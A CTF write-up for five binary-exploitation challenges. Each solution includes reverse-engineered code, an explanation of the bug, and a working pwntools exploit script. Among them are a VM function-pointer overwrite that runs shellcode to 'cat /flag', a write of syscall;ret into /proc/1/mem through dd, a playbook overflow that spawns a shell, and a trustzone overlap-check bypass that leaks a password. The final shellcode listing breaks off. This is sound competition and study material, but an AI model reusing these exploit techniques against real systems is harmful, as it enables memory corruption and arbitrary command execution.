alt text

Write-ups for 5 challenges I solved.

Attachment

multiarch-2

Analyze

First, I analyzed two functions, mapSegment (0x1319) and panic (0x2A1E), to figure out the structure of the VM:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
// One dynamically allocated VM segment (IDA local type, reconstructed).
// Packed, so each entry is 12 bytes on x86-64: an 8-byte pointer followed by a 4-byte offset.
struct __attribute__((packed)) BufIO
{
char *data; // host buffer; allocNewSegment fills it with calloc(0x200, 1)
uint offset; // VM offset the buffer is mapped at (page-aligned by allocNewSegment)
};


struct __attribute__((packed)) __attribute__((aligned(1))) VM
{
void *page1;
void *page2;
void *pagedummy;
char *page3;
size_t size3;
char *(*func)(void);
char check[3];
int rip;
int stack;
uint regs[4];
BufIO bufs[5];
uint bufcount;
};


// Builds a fresh VM object from the three chunks described by SegmentList
// and returns it.  Decompiler output: none of the calloc/mmap results and
// none of the chunk sizes are checked inside this function.
VM *__fastcall mapSegment(SegmentList *SegmentList)
{
VM *vm; // rbx
void *page1_; // r14
void *page2_; // r13
void *page3_; // r12
size_t size; // r13

// 0x88 bytes, zero-initialised: this is the whole VM struct.
vm = (VM *)calloc(1uLL, 0x88uLL);
// Three separate 0x1000-byte mappings.  On Linux x86-64, prot 7 is
// PROT_READ|PROT_WRITE|PROT_EXEC and flags 33 (0x21) is
// MAP_SHARED|MAP_ANONYMOUS, i.e. each page is readable, writable and executable.
page1_ = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
vm->page1 = page1_;
page2_ = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
vm->page2 = page2_;
vm->pagedummy = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
// The third chunk lives on the heap and is sized by the input file.
page3_ = calloc(1uLL, SegmentList->chunk3.size);
vm->page3 = page3_;
// The function pointer the exploit later redirects.
vm->func = getFlag;
// Copy the chunk contents; chunk1/chunk2 sizes are not compared against
// the 0x1000-byte pages here.
memcpy(page1_, SegmentList->chunk1.data, SegmentList->chunk1.size);
memcpy(page2_, SegmentList->chunk2.data, SegmentList->chunk2.size);
size = SegmentList->chunk3.size;
memcpy(page3_, SegmentList->chunk3.data, SegmentList->chunk3.size);
vm->size3 = size;
// Initial register state: PC = 0x1000, SP = 0x8F00.
vm->rip = 4096;
vm->stack = 0x8F00;
return vm;
}

// Prints the VM register state and, when a2 is non-zero, the seven 32-bit
// stack words from SP-8 to SP+16, marking the word at SP with "* ".
// NOTE(review): the function is declared __noreturn but the listing ends
// without a terminating call; presumably the tail was cut from the excerpt.
void __fastcall __noreturn panic(VM *vm, char a2)
{
int i; // ebp
unsigned int current_stack; // r12d
const char *__; // rsi
int dest; // [rsp+Ch] [rbp-44h] BYREF
unsigned __int64 v6; // [rsp+10h] [rbp-40h]

// Value read from fs:0x28 and kept in a local (looks like the stack canary).
v6 = __readfsqword(0x28u);
printf(
" ---[ PC=0x%08x SP=0x%08x | A=0x%08x B=0x%08x C=0x%08x D=0x%08x\n",
vm->rip,
vm->stack,
vm->regs[0],
vm->regs[1],
vm->regs[2],
vm->regs[3]);
if ( a2 )
{
puts(" ---[ STACK CONTENTS");
// i runs over -8, -4, 0, 4, 8, 12, 16.
for ( i = -8; i != 20; i += 4 )
{
current_stack = vm->stack + i;
// Stop at the first address that read_4 cannot read.
if ( !read_4(vm, current_stack, &dest) )
break;
__ = " ";
if ( vm->stack == current_stack )
__ = "* ";
printf("\t%s0x%08x 0x%08x\n", __, current_stack, dest);
}
}
}

Basically, the VM struct has one PC register, one stack register and 4 general-purpose registers.
It has three pages (page1, page2 and pagedummy) which are used to store the bytecode; page3 is used to store the data.

func is a function pointer that mapSegment initializes to getFlag:

1
2
3
4
5
6
7
8
9
// Returns the value of the FLAG environment variable, or NULL when it is
// not set (in which case an error line is written to stderr).
char *getFlag()
{
char *v0; // rbx

v0 = getenv("FLAG");
if ( !v0 )
// 0x2E is the length of the message below.
fwrite("[E] no $FLAG set! do you need to hack harder?\n", 1uLL, 0x2EuLL, stderr);
return v0;
}

When I saw this function, I knew my job was to overwrite this function pointer.

For more details on how these 4 pages work, let's review getDesc and allocNewSegment.
In the getDesc function, it would return:

  • page1 + offset - 0x1000 if the offset is in range [0x1000, 0x2000) (this is why the initial value of pc is 0x1000)
  • page2 + offset - 0x2000 if the offset is in range [0x2000, 0x3000)
  • pagedummy + offset - 0x8000 if the offset is in range [0x8000, 0x9000)
  • Otherwise, it would return bufs[i].data[offset - bufs[i].offset] for the BufIO object that covers the offset

To figure out where these bufs object come from, check allocNewSegment:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
// Creates a new 0x200-byte segment, records it in the next free slot of
// vm->bufs and stores the VM offset that was chosen in *ret.
// Returns 1 on success and 0 when all 5 slots are already in use.
bool __fastcall allocNewSegment(VM *vm, int offset, unsigned int *ret)
{
unsigned __int8 n5; // r12
bool result; // al
unsigned int final_offset; // ebx
char *data; // rax
__int64 n5_1; // rdx

// Only the low byte of bufcount is read here and written below.
n5 = vm->bufcount;
result = 0;
if ( n5 != 5 )
{
// Round the requested offset down to a 0x1000 boundary; a request below
// 0x1000 falls back to 40960 (0xA000).
final_offset = offset & 0xFFFFF000;
if ( (offset & 0xFFFFF000) == 0 )
final_offset = 40960;
// Skip forward one page at a time while getDest still resolves the offset.
while ( getDest(vm, final_offset, 1LL) )
final_offset += 0x1000;
LOBYTE(vm->bufcount) = n5 + 1;
// The calloc result is not checked before it is stored.
data = (char *)calloc(0x200uLL, 1uLL);
n5_1 = n5;
vm->bufs[n5_1].data = data;
vm->bufs[n5_1].offset = final_offset;
*ret = final_offset;
return 1;
}
return result;
}

For the first time it is called:

  • if offset < 0x1000, it would allocate a BufIO object which represents the VM’s data at the offset [0xa000, 0xa000+0x200); on later calls that page is already mapped, so the next free page is used instead (0xb000, 0xc000, …, because final_offset advances by 0x1000 each time).
  • if offset >= 0x1000, it would allocate a BufIO object at the page-aligned offset (offset & 0xFFFFF000), moving on to the next free page when that one is already mapped; for example, a request inside page1 or page2 ends up at [0x3000, 0x3000+0x200).

That is why getDesc returns bufs[i].data[offset - bufs[i].offset] for any offset that is not covered by the three fixed pages.

Check some “interesting” syscall and find the bug

In exec_regVM function, there are two syscalls used for read/write buffer which should be useful for the future exploitation.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
{
switch ( op )
{
case 0u:
return 0;
case 1u:
LOBYTE(Int_1) = check_sys_num(vm);
Int = Int_1;
if ( (_BYTE)Int_1 )
{
switch ( vm->regs[0] )
{
case 0u:
Int = getInt(vm, &y);
if ( (_BYTE)Int )
vm->regs[0] = y;
else
vm->check[0] = 1;
break;
case 1u:
Int = readBuf(vm, vm->regs[1], vm->regs[2]);
if ( !(_BYTE)Int )
vm->check[0] = 1;
break;
case 2u:
Int = printBuf(vm, vm->regs[1], vm->regs[2]);
if ( !(_BYTE)Int )
vm->check[0] = 1;
break

I could call syscall 0 to change regs[0] and then call any syscall I want, but I had to find a way to control regs[1] and regs[2].

This thought led me to check opcode 0x21 of regVM. In this case, I could add any value to one of the registers:

1
2
3
4
5
6
7
8
9
case 0x21u:
v16 = vm->rip;
vm->rip = v16 + 1;
if ( (unsigned __int8)read_1(vm, v16, &n)
&& (LOBYTE(Int_3) = read_4(vm, (unsigned int)vm->rip, &y), Int = Int_3, (_BYTE)Int_3) )
{
vm->rip += 4;
vm->regs[(n >> 4) - 1] += y;
}

And … so I found something interesting. I control the value of n, and there is no check that (n >> 4) - 1 is within the bounds of regs, which means I could also change the contents of bufs (it directly follows regs in the VM struct)!

Up to now, everything was clear. I just need to call allocNewSegment to allocate a BufIO object and change its data to an address that is useful to leak memory.

Xrefs the allocNewSegment, I could use syscall 6 of stackVM to call the function with any arguments I want:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
if ( op.op == (char)0xA0 )
{
if ( check_sys_num(vm) )
{
if ( (unsigned __int8)read_1_stack(vm, &dest) )
{
switch ( dest )
{
...
case 6:
if ( (unsigned __int8)read_4_stack(vm, &inp)
&& allocNewSegment(vm, inp, &ret)
&& (unsigned __int8)pushInt(vm, ret) )
{
goto LABEL_22;
}
...
}
}
}
}
...

Calculate the offset between vm object and the first BufIO::data, we could change the data to vm->page2 and leak page2‘s address.

After that, just change the data to vm->func and func would point to page2 (which we could setup our shellcode on there).

alt text

Since the program uses a bit test to determine whether it should use regVM or stackVM, I asked ChatGPT to help craft the right payload :).

Final script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.binary = e = ELF("debug")
libc = e.libc
gs = """
ida_connect
"""


def start():
    """Launch the target and return the pwntools tube connected to it.

    The mode is chosen with pwntools magic arguments:

    LOCAL  -- run the binary locally with ``inp.masm`` as its argument.
    GDB    -- same, but started under gdb with the ``gs`` script.
    REMOTE -- ``python x.py REMOTE <host> <port>``: solve the proof of
              work printed by the server, then upload ``inp.masm``.

    Exits with a usage message when no mode is given.
    """
    if args.LOCAL:
        p = e.process(["inp.masm"])
    elif args.GDB:
        p = gdb.debug([e.path, "inp.masm"], gdbscript=gs)
    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode()
        log.info(cmd)
        # The proof-of-work command is sent by the server and run verbatim.
        ans = popen(f"bash -c '{cmd}'").read()
        p.sendlineafter(b'Solution? ', ans.encode())
        # NOTE(review): the upload is assumed to be remote-only, since the
        # local modes pass inp.masm on the command line.
        with open("inp.masm", "rb") as masm:
            data = masm.read()
        p.sendlineafter(b"How big is your program? ", str(len(data)).encode())
        p.send(data)
    else:
        raise SystemExit("usage: x.py LOCAL | GDB | REMOTE <host> <port>")
    return p


rip = 4096


def set_page3_bit(page3, rip, should_be_set):
    """Set or clear the bit for VM address ``rip`` in the segment-3 bitmap.

    ``page3`` is a mutable byte buffer (``bytearray``) holding one bit per
    VM address, starting at address 4096.  The byte index is
    ``(rip - 4096) // 8`` computed the way the target's C code does it
    (adding 7 before the shift for negative values), and the bit inside
    the byte is ``rip & 7``.

    When the byte index falls outside ``page3`` a warning is printed and
    the buffer is left untouched.  Returns ``None``.
    """
    # Apply same logic as in C:
    v2 = rip - 4089
    if rip >= 4096:
        v2 = rip - 4096
    index = v2 >> 3
    bit = rip & 7
    if not (0 <= index < len(page3)):
        print(f"Warning: v2 >> 3 = {index} out of bounds")
        return
    if should_be_set:
        page3[index] |= (1 << bit)
    else:
        page3[index] &= ~(1 << bit)


f = open("inp.masm", "wb")
f.write(b"MASM")


instructions = [
[0, p8(0x10)+p32(6)], # push 6
[0, p8(0xa0)+p32(0)], # call allocNewSegment(0)
[1, p8(0x21)+p8(5 << 4)+p32(0xffffef88)], # Change data -> page2
[1, p8(0x21)+p8(1 << 4)+p32(2)], # syscall 2
[1, p8(0x21)+p8(2 << 4)+p32(0xa000)],
[1, p8(0x21)+p8(3 << 4)+p32(0x8)],
[1, p8(1)], # print
[1, p8(0x21)+p8(5 << 4)+p32(0xffffffd8)],
[1, p8(1)],
[1, p8(0x21)+p8(5 << 4)+p32(0x28)],
[1, p8(0x21)+p8(1 << 4)+p32(0xffffffff)], # syscall 1
[1, p8(1)], # write
[0, p8(0x10)+p32(5)], # call getFlag
[0, p8(0xa0)+p32(0)],
]

segAdata = b''
segBdata = asm(shellcraft.cat("/flag"))
segCdata = bytearray(0x1000)

for ins in instructions:
segAdata += ins[1]


for expected, instr in instructions:
set_page3_bit(segCdata, rip, expected)
rip += len(instr)


segA = p8(1)+p16(19)+p16(len(segAdata))
segB = p8(2)+p16(19+len(segAdata))+p16(len(segBdata))
segC = p8(3)+p16(19+len(segAdata)+len(segBdata))+p16(len(segCdata))

f.write(segA+segB+segC+segAdata+segBdata+segCdata)

f.close()

p = start()

p.recvuntil(b'[I] executing program\n')
e.address = u64(p.recv(8)) - e.sym.getFlag
log.success(hex(e.address))

# p.sendline(p64(e.plt.puts))
segA_addr = u64(p.recv(8))

p.sendline(p64(segA_addr-0x1000))


p.interactive()

the-classic-notes-app

Bug

write_note doesn’t check whether offset (plus size) stays within the note’s size:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/* Copies size bytes from buffer into note number index, starting at offset.
 * Prints a message and returns without writing when index is out of range,
 * the note has not been created, or offset is negative. */
void write_note(int index, int offset, const char *buffer, int size)
{
if (index < 0 || index >= note_size)
{
printf("Index out of range\n");
return;
}
if (notes[index] == NULL)
{
printf("Create note first\n");
return;
}
if (offset < 0)
{
printf("Offset cannot be less than 0\n");
return;
}
/* BUG: neither offset nor size is compared against the size of the note,
 * so this copy can write past the end of notes[index]. */
memcpy(notes[index] + offset, buffer, size); // bug
}

Exploit

To make it easy to debug, I do not set GLIBC_TUNABLES='glibc.mem.tagging=1'.

alt text

  • Just write to notes[0] at offset 0x60, we actually change the value of notes[0].
    alt text

  • Write \xb8\x02 to make notes[0] point to flag function pointer.

  • After that, read notes[0] to leak the flag function address.

  • Write notes[0] at offset 0x18 to change the exit function pointer, we would want it become flag.

  • Try to change notes[0] to an invalid address -> read note -> segfault -> call flag

This seems quite easy, but what if set GLIBC_TUNABLES='glibc.mem.tagging=1':
alt text
alt text

The offset is random now, but just only for the highest byte.

So I just need to bruteforce offset, P=1/256:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#!/usr/bin/env python
from pwn import *
from time import sleep

context.binary = e = ELF("ctf")

gs = """
target remote:1234
"""


def start():
    """Start the aarch64 target and return the pwntools tube.

    LOCAL  -- run the binary under the bundled qemu-aarch64.
    GDB    -- same, with qemu's gdb stub listening on port 1234.
    REMOTE -- ``python x.py REMOTE <host> <port>``.

    Exits with a usage message when no mode is given.
    """
    argvs = ["./qemu-aarch64", "-L", "./aarch64-linux-gnu/"]
    if args.LOCAL:
        argvs.append(e.path)
        p = process(argvs)
    elif args.GDB:
        # "-g 1234" makes qemu wait for a debugger on that port.
        argvs.append("-g")
        argvs.append("1234")
        argvs.append(e.path)
        p = process(argvs)
        # gdb.attach(None, gdbscript=gs)
        # pause()
    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
    else:
        raise SystemExit("usage: x.py LOCAL | GDB | REMOTE <host> <port>")
    return p


def create_note(size: int):
    """Send the 'C<size>' command on the global tube ``p``."""
    p.sendlineafter(b'Give me your command:\n', b"C"+str(size).encode())


def read_note(idx: int):
    """Send the 'R<idx>' command on the global tube ``p``."""
    p.sendlineafter(b'Give me your command:\n',
                    b'R'+str(idx).encode())


def write_note(idx: int, offset: int, size: int, data: bytes):
    """Send the 'W<idx> <offset> <size>' command followed directly by ``data``.

    The raw bytes are appended right after the size, with no separator.
    """
    p.sendlineafter(b'Give me your command:\n',
                    b'W' + f"{idx} {offset} {size}".encode()+data)


for i in range(256+10):
try:
p = start()
# create_note(0x30)
in0 = p16(0x2a8)
write_note(0, 0x000000000000060, len(in0), in0)
read_note(0)
p.recvuntil(b'Note at 0: ')
in1 = p.recv(6)

except EOFError:
p.close()
continue
else:
log.info(hex(u64(in1+b'\0'*2)))
write_note(0, 0x10, len(in1), in1)
write_note(0, 0xf0-8, 8, b'A'*8)
read_note(0)
break

p.interactive()

pwn-datadefinition

Analyze

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import subprocess
import sys


def main():
    """Run ``dd`` with user-supplied arguments and user-supplied stdin.

    The first input line is split on whitespace and passed as the dd
    argument list; the second is fed to dd on stdin.  dd's stdout and
    stderr are printed afterwards.
    """
    print('Do you like dd? It is my favorite old-style tool :D\n')
    line = input(' > What is your favorite dd line?: ').encode()
    user_input = input(' > Any input to go with it?: ').encode()
    print('I like it! Let\'s give it a go!')
    # No shell is involved: the arguments go to dd as a list.
    res = subprocess.run(['dd'] + line.split(), input=user_input,
                         capture_output=True)
    print(res.stdout.decode('utf-8'))
    print(res.stderr.decode('utf-8'))
    print('It was fun, bye!')


if __name__ == '__main__':
main()

With dd, we can read/write any files, any where we want.
But the flag file has random name.

alt text

Somehow, the python file on the container is a static binary.

The author did not mention this in the challenge’s description. From this point on, I would call it a guessy challenge.

Since the addresses do not change, we could use the /proc/.../mem trick.

In the config files, I could guess the pid of python process should be 1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
mode: ONCE
uidmap {inside_id: "0"}
gidmap {inside_id: "0"}
keep_caps: true
...

cwd: "/home/user"

mount: [
....
{
dst: "/proc"
fstype: "proc"
rw: true
}
...
]
1
2
3
4
5
CMD kctf_setup && \
kctf_drop_privs \
socat \
TCP-LISTEN:1337,reuseaddr,fork \
EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /usr/bin/python3 -u /home/user/chall.py"

Since keep_caps is true, we should be able to write on /proc/1/mem.

alt text

Now, I have to write what and where?

Since line and user_input use default encoding of Python which is utf-8, I could not write any bytes I want, the byte should not be greater than 0x7f.

I found that when pymain_main is going to return, rdi=0, rsi=rsp-0x208, and rdx is big enough. So I just wrote syscall ; ret at the end of the function.
alt text

I would say that I was lucky to spot this way of dealing with this guessy challenge.

Final script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.arch = 'amd64'
shellcode = asm("""
syscall
ret
""")
escaped = ''.join(f'\\x{b:02x}' for b in shellcode)

host_port = sys.argv[1:]
p = remote(host_port[0], int(host_port[1]))

if host_port[0] != "localhost":
p.recvuntil(b'You can run the solver with:\n')
cmd = p.recvline().decode()
log.info(cmd)
ans = popen(f"bash -c '{cmd}'").read()
p.sendlineafter(b'Solution? ', ans.encode())

pause()

p.sendlineafter(b' > What is your favorite dd line?: ',
b'if=/proc/self/fd/0 of=/proc/1/mem bs=1 seek='+str(0x6BC71E).encode())
p.sendlineafter(b'Any input to go with it?:',
shellcode.decode('latin-1').encode())

pause()

p.send(
b'\0'*0x208 +
p64(0x00000000004f8dbd) + p64(0x75e1c1) + p64(0x00000000004f8dbd+1) +
p64(0x4206c0)
)

p.interactive()

pwn-playbook

Bug

The bug is only in new_playbook function:

  • Since nesting_depth is global variable, there is always a chance that p_idx can be decreased even it is still pointing to idx[0]:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int idx[11]; // [rsp+1004h] [rbp-4Ch] BYREF
int *p_idx; // [rsp+1030h] [rbp-20h] MAPDST
int nest; // [rsp+1038h] [rbp-18h]

p_idx = idx;
nest = 1;
len = 251;
puts("Enter new playbook in the SOPS language. Empty line finishes the entry.");
idx[0] = allocate_playbook();
while ( fgets(inpbuf, len, stdin) && inpbuf[0] != 10 )
{
memset(buf, 0, sizeof(buf));
_isoc99_sscanf(inpbuf, "%s", buf);
...
{
if ( !strcmp(buf, "ENDSTEP") )
{
--p_idx;
if ( --nesting_depth < 0 )
{
puts("Mismatched STEP and ENDSTEP.");
exit(1);
}
}
  • We can decrease p_idx twice before running STEP, when p_idx is increased again, it will point to len, that means len would be equal to the return value of allocate_playbook:
1
2
3
4
5
6
7
8
9
10
11
12
if ( !strcmp(buf, "STEP") )
{
++p_idx;
if ( ++nesting_depth > 9 )
{
puts("Max nesting depth reached.");
exit(1);
}
*p_idx = allocate_playbook();
add_child(*(p_idx - 1), *p_idx);
nest = 1;
}
  • I need len should be greater than 512 so I could overwrite the next playbook via strcpy:
    1
    strcpy_ifunc(steps[*p_idx].data, buf);

This can be achieved by creating more than 512 playbooks beforehand.

Exploit

Just need to change the type of the next playbook to cmd, it would run any command in note‘s data.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
#!/usr/bin/env python
from pwn import *
from os import popen
from time import sleep

context.binary = e = ELF("chal")

gs = """
set follow-fork-mode parent
# b *0x4021C5
# b *0x402605
# b new_playbook
# b *0x401E69
b *0x4025B7
"""


def start():
    """Start the target and return the pwntools tube.

    LOCAL  -- run the binary locally.
    REMOTE -- ``python x.py REMOTE <host> <port>``: connect and solve the
              proof of work printed by the server.

    Exits with a usage message when no mode is given.
    """
    if args.LOCAL:
        p = e.process()

    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode()
        log.info(cmd)
        # The proof-of-work command is sent by the server and run verbatim.
        ans = popen(f"bash -c '{cmd}'").read()
        p.sendlineafter(b'Solution? ', ans.encode())
    else:
        raise SystemExit("usage: x.py LOCAL | REMOTE <host> <port>")
    return p


def add(list_data: list[bytes]):
    """Choose menu entry 2 and send every element of ``list_data`` as one line."""
    p.sendline(b"2")
    p.recvuntil(
        b'Enter new playbook in the SOPS language. Empty line finishes the entry.\n')
    for data in list_data:
        # if len(data) == 251 or b'\n' in data:
        #     p.send(data)
        # else:
        p.sendline(data)


def remove(idx):
    """Choose menu entry 3 and send the playbook id ``idx``."""
    p.sendlineafter(b"5. Quit\n", b"3")
    p.sendlineafter(b"Enter playbook id:\n", str(idx).encode())


def execute(idx):
    """Choose menu entry 4 and send the playbook id ``idx``."""
    p.sendlineafter(b"5. Quit\n", b"4")
    p.sendlineafter(b"Enter playbook id:\n", str(idx).encode())


p = start()

# for i in range(1, 0x50):
# add([b"note: " + b'A' * 0x30, b'STEP',
# b"note: " + b'B' * 0x30, b'ENDSTEP', b'\n'])
# remove(i + 1)

# add([b"note: " + b'A' * 0x30, b'\n'])
# execute(1)
# for i in range(0x4f):
# p.recvuntil(b'Note: ')
# if i == 0xa:
# p.sendline(p8(i))
# else:
# p.send(p8(i)*251)

# sleep(1)

for i in range(1, 512+30):
if i < 3:
add([b"note: " + b'A' * 0x30, b'STEP', b'\n'])
else:
add([b"note: " + b'sh', b'\n'])
log.info(str(i))


if args.GDB:
gdb.attach(p, gdbscript=gs)
pause()

# p.sendline(b'#'*249)
# p.sendline(b"2")
# p.recvuntil(
# b'Enter new playbook in the SOPS language. Empty line finishes the entry.\n')
# p.send(b'note: ')
# for i in range(250-7):
# p.send(b' ')

# pause()

# p.proc.stdin.close()
remove(512+20)
remove(512+21)

add([b'ENDSTEP', b'ENDSTEP', b'STEP', b'note: '+b'1'*(512)+p8(1 | 2), b'\n'])

execute(512+22)

p.sendline(b'\ncat /flag ; cat /flag.txt ; cat flag.txt ; cat flag')

p.interactive()

pwn-unicornel-trustzone

Analyze

The documentation only describes how these three trustzones work; it does not include their code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
There are currently three example trustzones you can load:

Name: create_map_shared_x86_64
Calling Convention: rax = trustzone_invoke syscall #, rbx = addr, rcx = length
Return Value: rbx = shared memory handle, or error code from create_shared if a buffer could not be created
Description: This trustzone will create and map a shared memory buffer of the desired length into the current
process at the specified address.

Name: map_shared_x86_64
Calling Convention: rax = trustzone_invoke syscall #, rbx = shared memory handle, rcx = addr, rdx = length
Return Value: rbx = 0xffff on validate_handle failure, or the return value from the map_address syscall
Description: This trustzone maps a shared memory buffer specified by the handle into the current process at
the specified address.

Name: memprot_x86_64
Calling Convention: rax = trustzone_invoke syscall #, rbx = addr, rcx = length, rdx = prot, rdi = password
Return Value: rbx = 0xffff on password authentication failure, or the return value from the memprot syscall
Description: This trustzone sets the memory protection on a range of memory. Please note that rdi must be a
pointer to a string containing the password.

So I created map_shared_x86_64 and memprot_x86_64 based on what the document says ( I don’t need create_map_shared_x86_64 since create_shared is not trusted syscall):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from pwn import *

context.arch = 'amd64'

open("map_shared_x86_64", "wb").write(asm("""
mov r10, rcx
mov rcx, rdx
mov rax, 4
int 3
//validate_handle rax = address
mov rbx, rax
mov rcx, r10
xchg rcx, rdx
xchg rdx, rbx
mov rax, 5
int 3
// map_address
mov rbx,rax
"""))
open("memprot_x86_64", "wb").write(asm("""
mov rax, 11
mov r10, rbx
mov r11, rdx
mov rbx, rdi
//confirm password
int3
cmp eax,0
je continue
mov ebx, 0xffff
jmp done
continue:
mov rbx, r10
mov rdx, r11
mov rax, 12
int3
done:
nop
"""))

As the document says, we need password authentication to be success to use memprot_x86_64

Why I needed memprot_x86_64? Because it changes perm of any address, includes trustzone:

1
2
3
4
5
6
7
/* Syscall handler: changes the protection of a guest memory range and
 * returns the result of uc_mem_protect.  The range itself is not
 * validated here, so it may also cover the trustzone. */
long memprot(struct process* current) {
/* NOTE(review): presumably rejects callers that are not running inside the trustzone - confirm against the macro. */
TRUSTED_SYSCALL;
/* Arguments 1..3 of the calling process: address, length, protection. */
unsigned long addr = ARG_REGR(current,1);
unsigned long length = ARG_REGR(current,2);
unsigned long prot = ARG_REGR(current,3);
return uc_mem_protect(current->uc,addr,length,prot);
}

Since only the trustzone’s bytecode can call trusted syscalls, being able to write that bytecode is promising for further exploitation.

Leak password

Reading the source codes of confirm_password, I could be sure that password file should be in the same directory with the chal file:

1
int password_fd = open("password",O_RDONLY);

I could take advantage of create_trustzone to read the password file and load it at any address, since the function can open any file in the same directory:

1
2
3
4
5
6
for(unsigned i = 0; i < sizeof(filename); i++) {
if(filename[i] == '.' || filename[i] == '/') {
filename[i] = '_';
}
}
int fd = open(filename,O_RDONLY);

But the safe_read check if the address is overlap with trustedzone or not, so it was not easy to read the password:

1
2
3
4
5
6
7
8
/* Returns true when a trustzone is installed (trusted_zone_hook is set) and
 * the range [src, src + n) intersects the page-aligned trustzone range.
 * src is a signed long and src + n is not checked for wrap-around: with
 * src = 0xfffffffffffff000 and n = 0x1000 the sum is 0, so the first
 * comparison succeeds and the range is reported as non-overlapping. */
bool overlaps_tz(struct process* current,long src, unsigned n) {
return current->trusted_zone_hook && !(src + n <= current->trustzone || current->trustzone + PAGE_ALIGN(current->tz_size) <= src);
}

/* Reads n bytes of guest memory at src into dst and returns the result of
 * uc_mem_read.  When the range overlaps the trustzone the TRUSTED_SYSCALL
 * check is applied first.
 * NOTE(review): presumably that macro returns early for untrusted callers - confirm. */
uc_err safe_read(struct process* current, char* dst, long src, size_t n) {
if(overlaps_tz(current,src,n)) TRUSTED_SYSCALL;
return uc_mem_read(current->uc,src,dst,n);
}

First, I had thought to make the size be so big that src + n could cause integer overflow (which mean src + n < src).

This is ridiculous because no process can handle big size like that.

But I re-thought again, what if the value of address is so big instead of the size?

alt text
alt text

Turned out, unicorn doesn’t care if the address is in user-space or kernel-space. After all, it is just an emulator.

Since src = trustzone = 0xfffffffffffff000, and size = 0x1000; I could bypass overlaps_tz now.

alt text

Shellcode:

1
2
3
4
5
6
7
8
9
10
11
12
mov rax, 8
mov rbx, 0xfffffffffffff000
lea rcx, [rip+password]
int3

mov rax,1
mov rbx, 0xfffffffffffff000
mov rcx, 0x1000
int3

password:
.asciz "password"

Leak emulator address

With the leaked password, I could use memprot_x86_64 to enable write perm to trustzone.

The validate_handle function returns shared_buffers’s address:

1
2
3
4
5
long validate_handle(struct process* current) {
TRUSTED_SYSCALL;
...
return (long) shared_buffers[handle].buffer;
}

so I could write the shellcode calls this function and print the return value to leak address:

1
2
3
4
5
6
7
mov eax, 4
xor ebx, ebx
mov ecx, 0x1000
int3
mov rbx, rax
mov eax,2
int3

I chose to allocate a buffer has the size of 0xf000. This buffer should be fixed with TLS address, which I could take advantage of this to leak other segments’ addresses:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
mov rsp, 0x13380800

mov rax, 3
mov rbx, 0xf000
int3
// calloc 0xf000

mov rax, 8
mov rbx, 0x42420000
lea rcx, [rip+memprot_x86_64]
int3

mov rax, 10
mov rbx, 0x42420000
mov rcx, 0x1000
mov rdx, 7
lea rdi, [rip+password_buffer]
int3

mov rbx, rax
mov rax, 2
int3

mov rdi, 0x42420000
lea rsi, [rip+evil]
mov edx, 0x20
call memcpy

mov eax,10
int3

jmp $
map_shared_x86_64:
.asciz "map_shared_x86_64"
memprot_x86_64:
.asciz "memprot_x86_64"
password_buffer:
.asciz "sup3r_s3cure_sj\0"
password:
.asciz "password"
newline:
.asciz "\n"
nop

memcpy:
test rdx, rdx
